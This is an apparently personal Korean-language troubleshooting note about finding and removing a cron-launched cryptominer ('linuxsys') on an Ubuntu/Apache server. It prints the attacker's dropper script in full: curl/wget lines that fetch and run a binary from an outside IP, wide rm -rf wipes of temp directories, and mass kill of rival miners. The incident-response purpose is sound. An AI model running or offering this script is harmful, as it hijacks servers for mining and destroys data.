1. 증상
top 명령서 "linuxsys" 라는 놈이 cpu 600~700 차지하고
아파치 서버가 거의 죽을 정도로 동작
2. 채굴기
top 으로 보면 linuxsys 라는 놈 프로세스 아무리 찾아도 안보인다.
프로세스로 사용중인 포트와 ip를 찾아보니 http://141.94.96.195/ 이게 나온다.
접속해보면~
Mining Pool Online
내 서버로 채굴을 하고 있군...
2. 시스템로그 추적결과 클론쪽에서 저런 동작이 보인다.
클론에서 동작중인 내용을 보면
wget http://103.214.112.10/linux.sh 으로 받아오고
curl 로 실행을 시키고 있다.
#!/bin/sh
p=$(ps aux | grep -E 'linuxsys|jailshell' | grep -v grep | wc -l)
if [ ${p} -eq 1 ];then
echo "Aya keneh proses. Tong waka nya!"
# Kill All Process & Remove Files
rm -rf /dev/shm/*; rm -rf /dev/shm/.*; rm -rf /tmp*; rm -rf /tmp/.*; rm -rf /var/tmp*; rm -rf /var/tmp/.*; rm -rf ~/config.json; rm -rf ~/linuxsys; rm -rf ./config.json; rm -rf ./linuxsys; rm -rf linuxsh; rm -rf linux.sh; rm -rf cronsh; rm -rf killersh; ps -ef | grep -v grep | grep -E '185.122.204.197|screen|watchkid|wotchdog|watchhound|sleep|./zhudaj|./zyj24000|./zhuda|./LSHT|zhudaj|zyj24000|zhuda|LSHT|clinche|./WTF|confssh|bashirc|mysqldd|rodolf.sh|rodolf|sshexec|cnrig|attack|dovecat|javae|donate|scan\.log|xmr-stak|crond64|yespowersugar|/tmp/java|pastebin|/tmp/\.|/tmp/system|excludefile|agettyd|\./python|\./crun|\./\.|118/cf\.sh|/tmp/.UNIFI/.unifi.sh|\.6379|load\.sh|init\.sh|solr\.sh|\.rsyslogds|pnscan|masscan|kthreaddi|solrd|meminitsrv|networkservice|sysupdate|phpguard|phpupdate|networkmanager|knthread|mysqlserver|watchbog|zgrab|/dev/shm|/var/tmp|/tmp/*|/var/tmp/*|kik|hezb|kinsing|kdevtmpfsi|stratum|.zshrc|lb64|ld-linux-x86-64|iosk|205.147.101|/bin/sh ./*|./syslogd|./rcu|klogd|xmrig|/tmp/c3pool/xmrig|sysls|logo|logrunner|english|kthreaddk|./dir|./x|./clinche|./amd64|server.js|acpid|/tmp/.*|kthreaddo' | awk '{print $2}' | xargs -i kill -9 {} >/dev/null 2>&1
exit
elif [ ${p} -eq 0 ];then
echo "Sok bae ngalangkung weh!"
# Execute linuxsys
cd ./; curl -s http://132.148.235.237/wp-content/config.json -o config.json || wget -q -O config.json http://132.148.235.237/wp-content/config.json; curl -s http://132.148.235.237/wp-content/linuxsys -o linuxsys || wget -q -O linuxsys http://132.148.235.237/wp-content/linuxsys; chmod +x linuxsys; ./linuxsys
# Kill All Process & Remove Files
rm -rf /dev/shm/*; rm -rf /dev/shm/.*; rm -rf /tmp*; rm -rf /tmp/.*; rm -rf /var/tmp*; rm -rf /var/tmp/.*; rm -rf ~/config.json; rm -rf ~/linuxsys; rm -rf ./config.json; rm -rf ./linuxsys; rm -rf linuxsh; rm -rf linux.sh; rm -rf cronsh; rm -rf killersh; ps -ef | grep -v grep | grep -E '185.122.204.197|screen|watchkid|wotchdog|watchhound|sleep|./zhudaj|./zyj24000|./zhuda|./LSHT|zhudaj|zyj24000|zhuda|LSHT|clinche|./WTF|confssh|bashirc|mysqldd|rodolf.sh|rodolf|sshexec|cnrig|attack|dovecat|javae|donate|scan\.log|xmr-stak|crond64|yespowersugar|/tmp/java|pastebin|/tmp/\.|/tmp/system|excludefile|agettyd|\./python|\./crun|\./\.|118/cf\.sh|/tmp/.UNIFI/.unifi.sh|\.6379|load\.sh|init\.sh|solr\.sh|\.rsyslogds|pnscan|masscan|kthreaddi|solrd|meminitsrv|networkservice|sysupdate|phpguard|phpupdate|networkmanager|knthread|mysqlserver|watchbog|zgrab|/dev/shm|/var/tmp|/tmp/*|/var/tmp/*|kik|hezb|kinsing|kdevtmpfsi|stratum|.zshrc|lb64|ld-linux-x86-64|iosk|205.147.101|/bin/sh ./*|./syslogd|./rcu|klogd|xmrig|/tmp/c3pool/xmrig|sysls|logo|logrunner|english|kthreaddk|./dir|./x|./clinche|./amd64|server.js|acpid|/tmp/.*|kthreaddo' | awk '{print $2}' | xargs -i kill -9 {} >/dev/null 2>&1
fi
이러니 프로세스 파일을 찾아도 없지.
프로세스가 실행되면 파일은 삭제해버린다.
4. 해결
우분투 기준
/var/spool/cron/crontabs/www-data 여기 살펴보면
config.json, linuxsys 이 두놈이 있다. ㅋㅋ
삭제 해버리자.
5. 지켜본다.
아직은 아무 이상 없음...